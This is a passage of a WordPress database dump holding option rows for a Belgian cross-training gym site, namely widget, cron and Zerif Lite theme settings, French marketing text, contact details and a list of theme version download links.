(96, 'widget_recent-posts', 'a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}', 'yes'),
(97, 'widget_recent-comments', 'a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}', 'yes'),
(98, 'widget_archives', 'a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}', 'yes'),
(99, 'widget_meta', 'a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}', 'yes'),
(100, 'sidebars_widgets', 'a:10:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:15:\"sidebar-aboutus\";a:5:{i:0;s:22:\"zerif_clients-widget-1\";i:1;s:22:\"zerif_clients-widget-2\";i:2;s:22:\"zerif_clients-widget-3\";i:3;s:22:\"zerif_clients-widget-4\";i:4;s:22:\"zerif_clients-widget-5\";}s:20:\"zerif-sidebar-footer\";a:0:{}s:22:\"zerif-sidebar-footer-2\";a:0:{}s:22:\"zerif-sidebar-footer-3\";a:0:{}s:16:\"sidebar-ourfocus\";a:4:{i:0;s:17:\"ctup-ads-widget-1\";i:1;s:17:\"ctup-ads-widget-2\";i:2;s:17:\"ctup-ads-widget-3\";i:3;s:17:\"ctup-ads-widget-4\";}s:20:\"sidebar-testimonials\";a:3:{i:0;s:21:\"zerif_testim-widget-1\";i:1;s:21:\"zerif_testim-widget-2\";i:2;s:21:\"zerif_testim-widget-3\";}s:15:\"sidebar-ourteam\";a:4:{i:0;s:19:\"zerif_team-widget-1\";i:1;s:19:\"zerif_team-widget-2\";i:2;s:19:\"zerif_team-widget-3\";i:3;s:19:\"zerif_team-widget-4\";}s:13:\"array_version\";i:3;}', 'yes'),
(101, 'widget_pages', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(102, 'widget_calendar', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(103, 'widget_media_audio', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(104, 'widget_media_image', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(105, 'widget_media_gallery', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(106, 'widget_media_video', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(107, 'widget_tag_cloud', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(108, 'widget_nav_menu', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(109, 'widget_custom_html', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(110, 'cron', 'a:4:{i:1546172840;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1546176427;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1546176440;a:2:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}s:7:\"version\";i:2;}', 'yes'),
(111, 'theme_mods_twentyseventeen', 'a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1535895144;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}', 'yes'),
(227, '_transient_timeout_feed_76f8d9281c01f21e505004d0986f50c6', '1546214676', 'no'),
(125, 'auto_core_update_notified', 'a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:12:\"stv@otvr.net\";s:7:\"version\";s:5:\"4.9.9\";s:9:\"timestamp\";i:1546170840;}', 'no'),
(200, '_site_transient_timeout_theme_roots', '1546172633', 'no'),
(201, '_site_transient_theme_roots', 'a:4:{s:13:\"twentyfifteen\";s:7:\"/themes\";s:15:\"twentyseventeen\";s:7:\"/themes\";s:13:\"twentysixteen\";s:7:\"/themes\";s:10:\"zerif-lite\";s:7:\"/themes\";}', 'no'),
(145, 'current_theme', 'Zerif Lite', 'yes'),
(146, 'theme_mods_zerif-lite', 'a:33:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}s:18:\"custom_css_post_id\";i:-1;s:22:\"zerif_ourfocus_title_2\";s:33:\"Pourquoi le Cross Training Namur?\";s:23:\"zerif_ourfocus_subtitle\";s:55:\"Un cours collectif complet pour atteindre ses objectifs\";s:19:\"zerif_aboutus_title\";s:31:\"Le plus du Cross Training Namur\";s:22:\"zerif_aboutus_subtitle\";s:0:\"\";s:26:\"zerif_aboutus_biglefttitle\";s:43:\"Un Bilan Forme et Santé pour chaque client\";s:18:\"zerif_aboutus_text\";s:572:\"Pour nous, il est difficile de vous proposer une activité physique adaptée à vos besoins sans prendre le temps de faire connaissance avec vous. Pour cette raison, chacun de nos nouveaux membres passe par une séance spécifique de bienvenue. Durant cette séance, vous aurez l’occasion de faire la connaissance de notre équipe et de nos infrastructures. Ensuite, votre coach du jour vous aidera à cibler vos objectifs, vous proposera d’analyser vos données personnelles et vous concoctera une séance spécifique. Tout pour bien débuter une nouvelle pratique ! \";s:23:\"zerif_bottomribbon_text\";s:0:\"\";s:30:\"zerif_bottomribbon_buttonlabel\";s:0:\"\";s:29:\"zerif_bottomribbon_buttonlink\";s:0:\"\";s:28:\"zerif_aboutus_feature1_title\";s:0:\"\";s:25:\"zerif_aboutus_feature1_nr\";i:0;s:28:\"zerif_aboutus_feature2_title\";s:0:\"\";s:25:\"zerif_aboutus_feature2_nr\";i:0;s:28:\"zerif_aboutus_feature3_title\";s:0:\"\";s:25:\"zerif_aboutus_feature3_nr\";i:0;s:28:\"zerif_aboutus_feature4_title\";s:0:\"\";s:25:\"zerif_aboutus_feature4_nr\";i:0;s:19:\"zerif_ourteam_title\";s:35:\"L’équipe du Cross Training Namur\";s:22:\"zerif_ourteam_subtitle\";s:0:\"\";s:22:\"zerif_ribbonright_text\";s:691:\"Vous recherchez une séance collective familiale pour améliorer votre santé et votre condition physique alors le Cross Training Namur est fait pour vous. En effet, nous proposons du lundi au vendredi en soirée des séances de circuit training de maximum 8 personnes. Les exercices ludiques et efficaces s’enchaineront sur un fond musical pour augmenter le plaisir. Le travail d’endurance musculaire et cardio-vasculaire vous permettra au fur et à mesure des séances d’augmenter votre souffle, votre coordination, votre équilibre, de tonifier vos muscles,… Nos spécialistes seront toujours là pour répondre à vos questions et vous aider à rendre vos séances plus efficace.\";s:29:\"zerif_ribbonright_buttonlabel\";s:24:\"Envie d\'en savoir plus ?\";s:23:\"zerif_testimonials_show\";b:1;s:21:\"zerif_latestnews_show\";b:1;s:20:\"zerif_contactus_show\";b:1;s:13:\"zerif_address\";s:28:\"Rue de Bauw, 25\n5020 Malonne\";s:11:\"zerif_email\";s:27:\"info@crosstrainingnamur.be \";s:11:\"zerif_phone\";s:19:\"+32 (0) 478 934 006\";s:32:\"zerif_bigtitle_redbutton_label_2\";s:26:\"Envie d’en savoir plus ?\";s:22:\"zerif_bigtitle_title_2\";s:20:\"Cross Training Namur\";s:32:\"zerif_bigtitle_greenbutton_label\";s:27:\"Rejoignez-nous sur Facebook\";}', 'yes'),
(147, 'theme_switched', '', 'yes'),
(148, 'zerif_lite_install', '1535895144', 'yes'),
(154, 'obfx_beta_show_safe-updates', 'no', 'yes'),
(155, 'obfx_beta_show_image-cdn', 'yes', 'yes'),
(156, 'recently_activated', 'a:0:{}', 'yes'),
(157, 'widget_ctup-ads-widget', 'a:5:{i:1;a:6:{s:5:\"title\";s:17:\"Séance complète\";s:4:\"text\";s:195:\"Séance d’1h d’entrainement permettant de travailler l’endurance musculaire et l’endurance cardio-vasculaire. Idéal pour la perte de poids, le développement de la condition physique,…\";s:4:\"link\";s:1:\"#\";s:9:\"image_uri\";s:82:\"http://dev.crosstrainingcenter.be/wp-content/themes/zerif-lite/images/parallax.png\";s:15:\"custom_media_id\";s:0:\"\";s:19:\"image_in_customizer\";s:0:\"\";}i:2;a:6:{s:5:\"title\";s:19:\"Outils fonctionnels\";s:4:\"text\";s:147:\"Pour un meilleure transfert dans votre vie quotidienne et des résultats rapides, nous avons choisi pour vous des outils fonctionnels et innovants.\";s:4:\"link\";s:1:\"#\";s:9:\"image_uri\";s:77:\"http://dev.crosstrainingcenter.be/wp-content/themes/zerif-lite/images/woo.png\";s:15:\"custom_media_id\";s:0:\"\";s:19:\"image_in_customizer\";s:0:\"\";}i:3;a:6:{s:5:\"title\";s:26:\"Encadrement professionnel \";s:4:\"text\";s:169:\"Pour une écoute et une prise en charge optimale, chacun de nos coaches est diplômé d’une Haute École ou d’une Université et spécialisé dans domaine du sport. \";s:4:\"link\";s:1:\"#\";s:9:\"image_uri\";s:77:\"http://dev.crosstrainingcenter.be/wp-content/themes/zerif-lite/images/ccc.png\";s:15:\"custom_media_id\";s:0:\"\";s:19:\"image_in_customizer\";s:0:\"\";}i:4;a:6:{s:5:\"title\";s:16:\"Approche globale\";s:4:\"text\";s:185:\"Bien plus qu’une séance de sport, nous vous dispenserons aussi de conseils pour une alimentation équilibrée et une gestion des stress qui vous permettra d’optimiser vos séances.\";s:4:\"link\";s:1:\"#\";s:9:\"image_uri\";s:81:\"http://dev.crosstrainingcenter.be/wp-content/themes/zerif-lite/images/ti-logo.png\";s:15:\"custom_media_id\";s:0:\"\";s:19:\"image_in_customizer\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}', 'yes'),
(210, '_transient_timeout_zerif_lite_18544versions', '1548763471', 'no'),
(211, '_transient_zerif_lite_18544versions', 'a:105:{i:0;a:2:{s:7:\"version\";s:3:\"1.0\";s:3:\"url\";s:56:\"https://downloads.wordpress.org/theme/zerif-lite.1.0.zip\";}i:1;a:2:{s:7:\"version\";s:5:\"1.0.1\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.0.1.zip\";}i:2;a:2:{s:7:\"version\";s:5:\"1.0.2\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.0.2.zip\";}i:3;a:2:{s:7:\"version\";s:5:\"1.0.3\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.0.3.zip\";}i:4;a:2:{s:7:\"version\";s:5:\"1.0.4\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.0.4.zip\";}i:5;a:2:{s:7:\"version\";s:5:\"1.0.5\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.0.5.zip\";}i:6;a:2:{s:7:\"version\";s:5:\"1.0.6\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.0.6.zip\";}i:7;a:2:{s:7:\"version\";s:5:\"1.0.7\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.0.7.zip\";}i:8;a:2:{s:7:\"version\";s:5:\"1.0.8\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.0.8.zip\";}i:9;a:2:{s:7:\"version\";s:5:\"1.0.9\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.0.9.zip\";}i:10;a:2:{s:7:\"version\";s:3:\"1.1\";s:3:\"url\";s:56:\"https://downloads.wordpress.org/theme/zerif-lite.1.1.zip\";}i:11;a:2:{s:7:\"version\";s:3:\"1.3\";s:3:\"url\";s:56:\"https://downloads.wordpress.org/theme/zerif-lite.1.3.zip\";}i:12;a:2:{s:7:\"version\";s:5:\"1.3.1\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.3.1.zip\";}i:13;a:2:{s:7:\"version\";s:5:\"1.3.2\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.3.2.zip\";}i:14;a:2:{s:7:\"version\";s:5:\"1.3.3\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.3.3.zip\";}i:15;a:2:{s:7:\"version\";s:5:\"1.3.4\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.3.4.zip\";}i:16;a:2:{s:7:\"version\";s:5:\"1.3.5\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.3.5.zip\";}i:17;a:2:{s:7:\"version\";s:5:\"1.3.6\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.3.6.zip\";}i:18;a:2:{s:7:\"version\";s:5:\"1.3.8\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.3.8.zip\";}i:19;a:2:{s:7:\"version\";s:5:\"1.3.9\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.3.9.zip\";}i:20;a:2:{s:7:\"version\";s:5:\"1.4.0\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.4.0.zip\";}i:21;a:2:{s:7:\"version\";s:5:\"1.4.1\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.4.1.zip\";}i:22;a:2:{s:7:\"version\";s:5:\"1.4.3\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.4.3.zip\";}i:23;a:2:{s:7:\"version\";s:5:\"1.4.4\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.4.4.zip\";}i:24;a:2:{s:7:\"version\";s:5:\"1.4.5\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.4.5.zip\";}i:25;a:2:{s:7:\"version\";s:5:\"1.4.6\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.4.6.zip\";}i:26;a:2:{s:7:\"version\";s:5:\"1.4.7\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.4.7.zip\";}i:27;a:2:{s:7:\"version\";s:5:\"1.5.0\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.5.0.zip\";}i:28;a:2:{s:7:\"version\";s:5:\"1.5.1\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.5.1.zip\";}i:29;a:2:{s:7:\"version\";s:5:\"1.5.2\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.5.2.zip\";}i:30;a:2:{s:7:\"version\";s:5:\"1.5.4\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.5.4.zip\";}i:31;a:2:{s:7:\"version\";s:5:\"1.6.0\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.6.0.zip\";}i:32;a:2:{s:7:\"version\";s:5:\"1.6.9\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.6.9.zip\";}i:33;a:2:{s:7:\"version\";s:5:\"1.7.1\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.7.1.zip\";}i:34;a:2:{s:7:\"version\";s:5:\"1.7.2\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.7.2.zip\";}i:35;a:2:{s:7:\"version\";s:5:\"1.7.3\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.7.3.zip\";}i:36;a:2:{s:7:\"version\";s:5:\"1.7.6\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.7.6.zip\";}i:37;a:2:{s:7:\"version\";s:5:\"1.8.0\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.0.zip\";}i:38;a:2:{s:7:\"version\";s:5:\"1.8.1\";s:3:\"url\";s:58:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.1.zip\";}i:39;a:2:{s:7:\"version\";s:7:\"1.8.2.1\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.2.1.zip\";}i:40;a:2:{s:7:\"version\";s:7:\"1.8.2.2\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.2.2.zip\";}i:41;a:2:{s:7:\"version\";s:7:\"1.8.2.3\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.2.3.zip\";}i:42;a:2:{s:7:\"version\";s:7:\"1.8.2.4\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.2.4.zip\";}i:43;a:2:{s:7:\"version\";s:7:\"1.8.2.5\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.2.5.zip\";}i:44;a:2:{s:7:\"version\";s:7:\"1.8.2.6\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.2.6.zip\";}i:45;a:2:{s:7:\"version\";s:7:\"1.8.2.7\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.2.7.zip\";}i:46;a:2:{s:7:\"version\";s:7:\"1.8.2.8\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.2.8.zip\";}i:47;a:2:{s:7:\"version\";s:7:\"1.8.2.9\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.2.9.zip\";}i:48;a:2:{s:7:\"version\";s:7:\"1.8.3.0\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.3.0.zip\";}i:49;a:2:{s:7:\"version\";s:7:\"1.8.3.1\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.3.1.zip\";}i:50;a:2:{s:7:\"version\";s:7:\"1.8.3.2\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.3.2.zip\";}i:51;a:2:{s:7:\"version\";s:7:\"1.8.3.3\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.3.3.zip\";}i:52;a:2:{s:7:\"version\";s:7:\"1.8.3.4\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.3.4.zip\";}i:53;a:2:{s:7:\"version\";s:7:\"1.8.3.5\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.3.5.zip\";}i:54;a:2:{s:7:\"version\";s:7:\"1.8.3.6\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.3.6.zip\";}i:55;a:2:{s:7:\"version\";s:7:\"1.8.3.7\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.3.7.zip\";}i:56;a:2:{s:7:\"version\";s:7:\"1.8.3.8\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.3.8.zip\";}i:57;a:2:{s:7:\"version\";s:7:\"1.8.4.0\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.4.0.zip\";}i:58;a:2:{s:7:\"version\";s:7:\"1.8.4.1\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.4.1.zip\";}i:59;a:2:{s:7:\"version\";s:7:\"1.8.4.3\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.4.3.zip\";}i:60;a:2:{s:7:\"version\";s:7:\"1.8.4.4\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.4.4.zip\";}i:61;a:2:{s:7:\"version\";s:7:\"1.8.4.5\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.4.5.zip\";}i:62;a:2:{s:7:\"version\";s:7:\"1.8.4.6\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.4.6.zip\";}i:63;a:2:{s:7:\"version\";s:7:\"1.8.4.7\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.4.7.zip\";}i:64;a:2:{s:7:\"version\";s:7:\"1.8.4.8\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.4.8.zip\";}i:65;a:2:{s:7:\"version\";s:7:\"1.8.4.9\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.4.9.zip\";}i:66;a:2:{s:7:\"version\";s:7:\"1.8.5.5\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.5.zip\";}i:67;a:2:{s:7:\"version\";s:7:\"1.8.5.6\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.6.zip\";}i:68;a:2:{s:7:\"version\";s:7:\"1.8.5.8\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.8.zip\";}i:69;a:2:{s:7:\"version\";s:7:\"1.8.5.9\";s:3:\"url\";s:60:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.9.zip\";}i:70;a:2:{s:7:\"version\";s:8:\"1.8.5.10\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.10.zip\";}i:71;a:2:{s:7:\"version\";s:8:\"1.8.5.11\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.11.zip\";}i:72;a:2:{s:7:\"version\";s:8:\"1.8.5.12\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.12.zip\";}i:73;a:2:{s:7:\"version\";s:8:\"1.8.5.13\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.13.zip\";}i:74;a:2:{s:7:\"version\";s:8:\"1.8.5.14\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.14.zip\";}i:75;a:2:{s:7:\"version\";s:8:\"1.8.5.15\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.15.zip\";}i:76;a:2:{s:7:\"version\";s:8:\"1.8.5.16\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.16.zip\";}i:77;a:2:{s:7:\"version\";s:8:\"1.8.5.17\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.17.zip\";}i:78;a:2:{s:7:\"version\";s:8:\"1.8.5.18\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.18.zip\";}i:79;a:2:{s:7:\"version\";s:8:\"1.8.5.19\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.19.zip\";}i:80;a:2:{s:7:\"version\";s:8:\"1.8.5.20\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.20.zip\";}i:81;a:2:{s:7:\"version\";s:8:\"1.8.5.21\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.21.zip\";}i:82;a:2:{s:7:\"version\";s:8:\"1.8.5.22\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.22.zip\";}i:83;a:2:{s:7:\"version\";s:8:\"1.8.5.23\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.23.zip\";}i:84;a:2:{s:7:\"version\";s:8:\"1.8.5.24\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.24.zip\";}i:85;a:2:{s:7:\"version\";s:8:\"1.8.5.25\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.25.zip\";}i:86;a:2:{s:7:\"version\";s:8:\"1.8.5.26\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.26.zip\";}i:87;a:2:{s:7:\"version\";s:8:\"1.8.5.27\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.27.zip\";}i:88;a:2:{s:7:\"version\";s:8:\"1.8.5.28\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.28.zip\";}i:89;a:2:{s:7:\"version\";s:8:\"1.8.5.29\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.29.zip\";}i:90;a:2:{s:7:\"version\";s:8:\"1.8.5.30\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.30.zip\";}i:91;a:2:{s:7:\"version\";s:8:\"1.8.5.31\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.31.zip\";}i:92;a:2:{s:7:\"version\";s:8:\"1.8.5.32\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.32.zip\";}i:93;a:2:{s:7:\"version\";s:8:\"1.8.5.33\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.33.zip\";}i:94;a:2:{s:7:\"version\";s:8:\"1.8.5.35\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.35.zip\";}i:95;a:2:{s:7:\"version\";s:8:\"1.8.5.36\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.36.zip\";}i:96;a:2:{s:7:\"version\";s:8:\"1.8.5.37\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.37.zip\";}i:97;a:2:{s:7:\"version\";s:8:\"1.8.5.39\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.39.zip\";}i:98;a:2:{s:7:\"version\";s:8:\"1.8.5.40\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.40.zip\";}i:99;a:2:{s:7:\"version\";s:8:\"1.8.5.41\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.41.zip\";}i:100;a:2:{s:7:\"version\";s:8:\"1.8.5.43\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.43.zip\";}i:101;a:2:{s:7:\"version\";s:8:\"1.8.5.44\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.44.zip\";}i:102;a:2:{s:7:\"version\";s:8:\"1.8.5.46\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.46.zip\";}i:103;a:2:{s:7:\"version\";s:8:\"1.8.5.47\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.47.zip\";}i:104;a:2:{s:7:\"version\";s:8:\"1.8.5.48\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.48.zip\";}}', 'no'),
(212, '_site_transient_timeout_browser_e0b7751b8040fb7c8de50ddf95d10645', '1546776272', 'no'),
(213, '_site_transient_browser_e0b7751b8040fb7c8de50ddf95d10645', 'a:10:{s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:4:\"64.0\";s:8:\"platform\";s:7:\"Windows\";s:10:\"update_url\";s:24:\"https://www.firefox.com/\";s:7:\"img_src\";s:44:\"http://s.w.org/images/browsers/firefox.png?1\";s:11:\"img_src_ssl\";s:45:\"https://s.w.org/images/browsers/firefox.png?1\";s:15:\"current_version\";s:2:\"56\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}', 'no'),
(214, 'themeisle_sdk_active_notification', 'a:2:{s:3:\"key\";s:32:\"pirate_formsThemeIsle_SDK_Logger\";s:4:\"time\";i:1546171472;}', 'yes'),
(215, '_transient_timeout_feed_9bc1b9ec726e1f508c5207949084454a', '1546214673', 'no');
INSERT INTO `ct_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
